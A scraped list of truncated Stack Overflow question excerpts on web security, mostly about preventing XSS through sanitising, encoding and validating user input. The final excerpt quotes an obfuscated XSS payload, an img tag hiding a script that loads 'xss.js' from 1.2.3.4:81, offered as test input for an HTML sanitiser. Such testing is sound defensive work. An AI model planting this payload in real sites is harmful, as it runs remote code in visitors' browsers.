I've created a tool that is used with a fairly popular music retailer. The tool provides an enhanced search feature (transparent last.fm results, no ads, no lameness, nothing creepy) and I've found the most useful and unobtrusive way to display the search is as a toolbar using the much maligned iframe. This allows users to load search w...
I'm putting together a little tool that some business people can run on their local filesystems, since we don't want to setup a host for it. Basically, its just HTML + Javascript (using jQuery) to pull some reports using REST from a 3rd party. The problem is, FF3 and IE don't allow the ajax call, I get: Access to restricted URI denied...
I am looking at starting a hosted CMS-like service for customers. As it would, it would require the customer to input text which would be served up to anyone that comes to visit their site. I am planning on using Markdown, possibly in combination with WMD (the live markdown preview that SO uses) for the big blocks of text. Now, should ...
Does WebSphere offer an HTTP input filter / firewall like mod_security? I know that it's possible to have Apache be the HTTP server front-end to WebSphere, but that type of configuration is beyond my influence. We're stuck using just what WebSphere itself can do. EDIT - To clarify, I am not looking for authentication, authorization, o...
Please take a look at the html listed below and let me know why IE6 freezes when trying to load the remote script (located at 'http://code.katzenbach.com/Default.aspx'). The script returns JSONP and executes the 'callbackFunction' listed in the header. When it runs correctly, you'll see a pop-up alert showing numbers 1-500. This works...
What's an example of something dangerous that would not be caught by the code below? EDIT: After some of the comments I added another line, commented below. See Vinko's comment in David Grant's answer. So far only Vinko has answered the question, which asks for specific examples that would slip through this function. Vinko provided...
I'm looking for best practices for performing strict (whitelist) validation/filtering of user-submitted HTML. Main purpose is to filter out XSS and similar nasties that may be entered via web forms. Secondary purpose is to limit breakage of HTML content entered by non-technical users e.g. via WYSIWYG editor that has an HTML view. I'm ...
We have a high security application and we want to allow users to enter URLs that other users will see. This introduces a high risk of XSS hacks - a user could potentially enter javascript that another user ends up executing. Since we hold sensitive data it's essential that this never happens. What are the best practices in dealing wit...
I have a webpage that redirects to another webpage like this: http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come ...
This is an extension of my earlier XSS question. Assuming that there isn't a Regex strong enough to guarantee XSS saftey for user entered URLs I'm looking at using a redirect. (Although if you do have one please add it under the other question) We have user input web addresses, so: stackoverflow.com They want a link to appear fo...
What is the best solution to sanitize output html in rails (to avoid XSS attacks)? I have two options: white_list plugin or sanitize method from Sanitize Helper http://api.rubyonrails.com/classes/ActionView/Helpers/SanitizeHelper.html? For me until today the white_list plugin worked better and in the past, Santize was very buggy, but as...
I want to write a browser based app that retrieves data from multiple websites and posts it to my server app. What are the best options to do this? The most straightforward approach would certainly be to have the server app retrieve the data, but that's not possible for copyright reasons. In my case individual users do have the right to...
If I HTML encode any data entered by website users when I redisplay it, will this prevent CSS vulnerabilities? Also, is there a tool/product available that will sanitize my user input for me, so that I don't have to write my own routines. ...
Simple question that keeps bugging me. Should I HTML encode user input right away and store the encoded contents in the database, or should I store the raw values and HTML encode when displaying? Storing encoded data greatly reduces the risk of a developer forgetting to encode the data when it's being displayed. However, storing the en...
Reading this blog post about HttpOnly cookies made me start thinking, is it possible for an HttpOnly cookie to be obtained through any form of XSS? Jeff mentions that it "raises the bar considerably" but makes it sound like it doesn't completely protect against XSS. Aside from the fact that not all browser support this feature properly,...
With so many ways to attack a site, it would be useful if there is a single guide, or resource, listing all known vunerabilties with possible preventative measures. Does anyone know of any? Also, is there a library or framework that can deal with this kind of thing? ...
I'm working on updating a classic ASP web page used by a number of sub-sites maintained at the company I work for. The purpose of the page is to notify the user that they are leaving "our" site and going to another site. It's basically a disclaimer, but due to resource limitations and time limitations I can't add the disclaimer to every...
Can someone explain how XSS works in plain english? Maybe with an example. Googling didn't help much. ...
I have a rich-text editor on my site that I'm trying to protect against XSS attacks. I think I have pretty much everything handled, but I'm still unsure about what to do with images. Right now I'm using the following regex to validate image URLs, which I'm assuming will block inline javascript XSS attacks: "https?://[-A-Za-z0-9+&@#/%?...
Hi, I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror <img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www....